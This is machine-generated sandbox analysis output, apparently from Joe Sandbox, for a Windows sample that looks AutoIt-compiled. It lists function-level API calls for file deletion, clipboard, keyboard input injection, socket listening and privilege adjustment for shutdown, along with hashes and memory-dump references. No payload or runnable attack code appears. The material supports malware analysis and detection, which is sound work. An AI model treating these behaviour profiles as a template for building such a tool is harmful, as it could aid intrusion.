AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0044B526
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0044B54C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0044B560

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: cc322dc7e3b2d1282aa0243d2960dca498ba2745f9229a1f347377d32fd16b94
Instruction ID: 27e5e041b97d0a242fe89dc4062fd12ae116b8756df927b1ac159286de8f9ddd
Opcode Fuzzy Hash: cc322dc7e3b2d1282aa0243d2960dca498ba2745f9229a1f347377d32fd16b94
Instruction Fuzzy Hash: 79512D71900209BBEF00DFA5DC45AEEBB79FF05348F04812AE915A7291DB35DA05CBA8

Function 00456E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004131DA

Part of subcall function 00457C0C: GetFileAttributesW.KERNEL32(?,00456A7B), ref: 00457C0D

_wcscat.LIBCMT ref: 00456E7E
__wsplitpath.LIBCMT ref: 00456E99
FindFirstFileW.KERNEL32(?,?), ref: 00456EAE
_wcscpy.LIBCMT ref: 00456EDD
_wcscat.LIBCMT ref: 00456EEF
_wcscat.LIBCMT ref: 00456F01
DeleteFileW.KERNEL32(?), ref: 00456F0E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00456F22
FindClose.KERNEL32(00000000), ref: 00456F3D

Strings

\*.*, xrefs: 00456E78

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: fcad694cac68cf5aa0dead60d8504c13a7315e88b0da597829ff707263484f7a
Instruction ID: 8ecc34228a70d6e28d95756175ce692c849a192d27543459ba317b1c4f77ed4c
Opcode Fuzzy Hash: fcad694cac68cf5aa0dead60d8504c13a7315e88b0da597829ff707263484f7a
Instruction Fuzzy Hash: 1D21E5B3409344AEC210EBA4D8459DF7BDC9F59215F444A2FF8D4C3152EA38D60DC76A

Function 00415D32 Relevance: 17.1, Strings: 13, Instructions: 810COMMON

Download Yara Rule

Strings

BSR_ANYCRLF), xrefs: 00416290
LF), xrefs: 00416234
NO_START_OPT), xrefs: 004161D8
CRLF), xrefs: 0041624B
LIMIT_MATCH=, xrefs: 004161EF
ANY), xrefs: 00416262
BSR_UNICODE), xrefs: 00493885
UTF), xrefs: 004161AA
ANYCRLF), xrefs: 00416279
LIMIT_RECURSION=, xrefs: 00416206
UTF16), xrefs: 00416193
CR), xrefs: 0041621D
UCP), xrefs: 004161C1

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-2893523900
Opcode ID: 5b8bd8d1663b2854295b71afe4c506dfbcabe7f71f1fddc279094301aaca9f37
Instruction ID: 3c3c497907f0b57f3442ef519f282264a9591ff785425b140387681b54ab2f1d
Opcode Fuzzy Hash: 5b8bd8d1663b2854295b71afe4c506dfbcabe7f71f1fddc279094301aaca9f37
Instruction Fuzzy Hash: 75628EB1E002199BDF14DF59C8807EEBBB5AF49310F15816BE805EB381D778DA81CB99

Function 00467294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004672BB
EmptyClipboard.USER32 ref: 004672C1
GlobalAlloc.KERNEL32(00000002,?), ref: 004672D6
CloseClipboard.USER32 ref: 00467375

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: be2f4dac2c97265bebe3712b019910ef494a52aebdbacd975df79646adc4f0ce
Instruction ID: 3cbcfb1b9a34569ccd6e9f2f1cd842bf137fae17e0c934af071e7d1adb575634
Opcode Fuzzy Hash: be2f4dac2c97265bebe3712b019910ef494a52aebdbacd975df79646adc4f0ce
Instruction Fuzzy Hash: 50219131604110AFD711AF25DC59B2E7BA8EF54715F00806BFD0A9B261EB78ED81CB9D

Function 004624A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 004624F6
Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00462526
_wcscmp.LIBCMT ref: 0046253A
_wcscmp.LIBCMT ref: 00462555
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 004625F3
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00462609

Strings

*.*, xrefs: 004624D8

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: c16fbc07893be68d2ef629b93f38cd9b86bd6f763c7fd405996e8fb0b623509f
Instruction ID: 6d3b050285c4e609466be64d9d6a2360742624951423c746aa7f7ea27c474726
Opcode Fuzzy Hash: c16fbc07893be68d2ef629b93f38cd9b86bd6f763c7fd405996e8fb0b623509f
Instruction Fuzzy Hash: A541907190060ABFCF14DFA5CD45AEF7BB4FF14304F10406BE816A2290E7789A84CB99

Function 00418530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON

Download Yara Rule

APIs

Part of subcall function 0041A2FB: _memmove.LIBCMT ref: 0041A33D

_memmove.LIBCMT ref: 00418672
_memmove.LIBCMT ref: 004186C2
_memmove.LIBCMT ref: 00418728

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 98606d73f5d4eba70340651cb3a51097b9465a8b604467d841bce62eda06929c
Instruction ID: de3fd6be2ca0e806565597edc207d1f464639a54cda5b92ab2cb2f8fff8819f7
Opcode Fuzzy Hash: 98606d73f5d4eba70340651cb3a51097b9465a8b604467d841bce62eda06929c
Instruction Fuzzy Hash: A7127A70A00609DBDF04DFA5DA81AEEB7F5FF48300F60456EE806E7250EB39A951CB59

Function 0047EAA6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0042AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0042AF8E

Part of subcall function 0042B736: GetCursorPos.USER32(000000FF), ref: 0042B749
Part of subcall function 0042B736: ScreenToClient.USER32(00000000,000000FF), ref: 0042B766
Part of subcall function 0042B736: GetAsyncKeyState.USER32(00000001), ref: 0042B78B
Part of subcall function 0042B736: GetAsyncKeyState.USER32(00000002), ref: 0042B799

ReleaseCapture.USER32 ref: 0047EB1A
SetWindowTextW.USER32(?,00000000), ref: 0047EBC2
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0047EBD5
NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0047ECAE

Strings

@GUI_DRAGFILE, xrefs: 0047EC49
@GUI_DROPID, xrefs: 0047EC05

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 973565025-2107944366
Opcode ID: b3e489083af176beb6ab04a6958b7d3aa60a2125c471535df333c2cc80f3720c
Instruction ID: 183fb700b366f4465036c797aa04e9ed23b914b48feb8cecf900a1c5c1aadb08
Opcode Fuzzy Hash: b3e489083af176beb6ab04a6958b7d3aa60a2125c471535df333c2cc80f3720c
Instruction Fuzzy Hash: E9519C30604304AFD700EF25CC96FAA7BE5FB88704F404A2EF955862E1D7789944DB5A

Function 004582D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 0044BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0044BF0F
Part of subcall function 0044BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0044BF3C
Part of subcall function 0044BEC3: GetLastError.KERNEL32 ref: 0044BF49

ExitWindowsEx.USER32(?,00000000), ref: 0045830C

Strings

SeShutdownPrivilege, xrefs: 004582DA
, xrefs: 004582FA
@, xrefs: 004582FF

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: fe0a4b0514c3c5e2377ab507c7aa53f4a770cbbe1a1f1b714f1c8470f9b617de
Instruction ID: 7a20530e46ba5edc181fcc0631e50bea1aead328fcce01c0c45448c5c2fe7c14
Opcode Fuzzy Hash: fe0a4b0514c3c5e2377ab507c7aa53f4a770cbbe1a1f1b714f1c8470f9b617de
Instruction Fuzzy Hash: 05018871B442116BF76826788C4ABBB7658DB15B86F14043FFD43F11D3DE599C0981AC

Function 004691DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00469235
WSAGetLastError.WS2_32(00000000), ref: 00469244
bind.WS2_32(00000000,?,00000010), ref: 00469260
listen.WS2_32(00000000,00000005), ref: 0046926F
WSAGetLastError.WS2_32(00000000), ref: 00469289
closesocket.WS2_32(00000000), ref: 0046929D

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 87a998172296f21c109db8704b99ce8f8f86abea5382fe438db37f4fd20f6edf
Instruction ID: 4e5b9292118da8ab3e75528bb6ca4347ec12cff1aaadf918ef39bb85a29017ab
Opcode Fuzzy Hash: 87a998172296f21c109db8704b99ce8f8f86abea5382fe438db37f4fd20f6edf
Instruction Fuzzy Hash: 9421E431600200AFCB10EF64CD95B6EB7A8EF44324F1085AFF916A7391D778AD41CB5A

Function 00416670 Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004167D0

Strings

hNL, xrefs: 0049216F
tML, xrefs: 00492183

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memmove
String ID: hNL$tML
API String ID: 4104443479-3413231550
Opcode ID: 62eb684dba45abd3a8e9fe14a3fd128888924880bae4bbb1abf225c2bb992336
Instruction ID: 7410a03525b152cb285e3edf2de5f996adba29b45b1654684b7cde5f625fa78f
Opcode Fuzzy Hash: 62eb684dba45abd3a8e9fe14a3fd128888924880bae4bbb1abf225c2bb992336
Instruction Fuzzy Hash: A9A26A74E01219DFCF24CF58C5806EEBBB1BF49314F2681AAD859AB390D7789D81CB58

Function 0041A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON

Download Yara Rule

APIs

Part of subcall function 0043010A: std::exception::exception.LIBCMT ref: 0043013E
Part of subcall function 0043010A: __CxxThrowException@8.LIBCMT ref: 00430153

_memmove.LIBCMT ref: 00483020
_memmove.LIBCMT ref: 00483135
_memmove.LIBCMT ref: 004831DC

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: ccab061f6a7f89eb54bc9398ae497221b0e74beeb511cdff4092acf6bec7ebc1
Instruction ID: 6ca16c1476be6018afd954e6be684c40455a62098670c65a17f552e862816ce6
Opcode Fuzzy Hash: ccab061f6a7f89eb54bc9398ae497221b0e74beeb511cdff4092acf6bec7ebc1
Instruction Fuzzy Hash: E502F270A00205DFCF04DF65D981AAEB7F5EF48300F1484AAE806DB355EB39DA55CB99

Function 004696E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0046ACD3: inet_addr.WS2_32(00000000), ref: 0046ACF5

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0046973D
WSAGetLastError.WS2_32(00000000,00000000), ref: 00469760

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: bf6a98e3a0237cbcbdbf9f642de71cd17543f86fcc9fcbaa060def65c20971af
Instruction ID: 085ee528341311903cd382e523f330f27ef8d30a8aac890358c1542187a83306
Opcode Fuzzy Hash: bf6a98e3a0237cbcbdbf9f642de71cd17543f86fcc9fcbaa060def65c20971af
Instruction Fuzzy Hash: FB41E770B00110AFDB10AF65CC82E6E77EDDF44328F54805EF956AB392DB78AD418B99

Function 0045F350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0045F37A
_wcscmp.LIBCMT ref: 0045F3AA
_wcscmp.LIBCMT ref: 0045F3BF
FindNextFileW.KERNEL32(00000000,?), ref: 0045F3D0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045F3FE

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: ad62c8066f1dfe8a5d238f5a352be8738bcaca8c76d53c17fa00728ea74072bc
Instruction ID: 3989565e837e326b223b6771d3b5657702ab568524ea3fd352c526ec06499f63
Opcode Fuzzy Hash: ad62c8066f1dfe8a5d238f5a352be8738bcaca8c76d53c17fa00728ea74072bc
Instruction Fuzzy Hash: 3641B4356043019FC704DF29C490E9AB3E4FF49328F10416EE95ACB3A2DB79B949CB59

Function 00454342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 0045439C
SetKeyboardState.USER32(00000080,?,00000001), ref: 004543B8
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00454425
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00454483

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 968ad9a9cb85bfe0e88878a64e4d6f4eb3b923c60b95b8c6126cbc336ca083fd
Instruction ID: b7cc822b6097bfe40cb775dac474e074aaaa2c3e7337c35ca19ace2ed6fc18e5
Opcode Fuzzy Hash: 968ad9a9cb85bfe0e88878a64e4d6f4eb3b923c60b95b8c6126cbc336ca083fd
Instruction Fuzzy Hash: C6410A70E44248AAEF249B6598047FE7BB56B9631BF04011BEC815B2C3C77C89CD9769

Function 0044BC8F Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0044BCD9
OpenProcessToken.ADVAPI32(00000000), ref: 0044BCE0
CloseHandle.KERNEL32(00000004), ref: 0044BCFA
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0044BD29

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
String ID:
API String ID: 2621361867-0
Opcode ID: 1710e77e0c940c924dc88239ca77384246616913986bd514e3f30ef07b1975cb
Instruction ID: 4b605f1dfc6ba19d2ec4212540d821934a004350417b06851fb4904a89ec1526
Opcode Fuzzy Hash: 1710e77e0c940c924dc88239ca77384246616913986bd514e3f30ef07b1975cb
Instruction Fuzzy Hash: 9A216572501209ABDF019FA8DD89FDE7BA9EF15304F04407AFD01A6160C77ACD61DB94

Function 0045220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045221E

Strings

|, xrefs: 0045224E
(, xrefs: 00452264

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
